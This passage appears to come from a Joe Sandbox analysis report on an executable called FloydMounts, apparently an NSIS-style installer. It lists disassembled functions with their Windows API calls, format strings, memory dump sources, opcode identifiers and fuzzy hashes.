                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                              • API String ID: 3156913733-2180253247
                                                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                              Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: nsa
                                                                                              • API String ID: 1716503409-2209301699
                                                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                              Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                              • String ID: HideWindow
                                                                                              • API String ID: 1249568736-780306582
                                                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                              Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                              Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                              Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                              Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                              Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID:
                                                                                              • API String ID: 4115351271-0
                                                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                              Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                              Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                              Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                              Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                              Non-executed Functions

                                                                                              Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
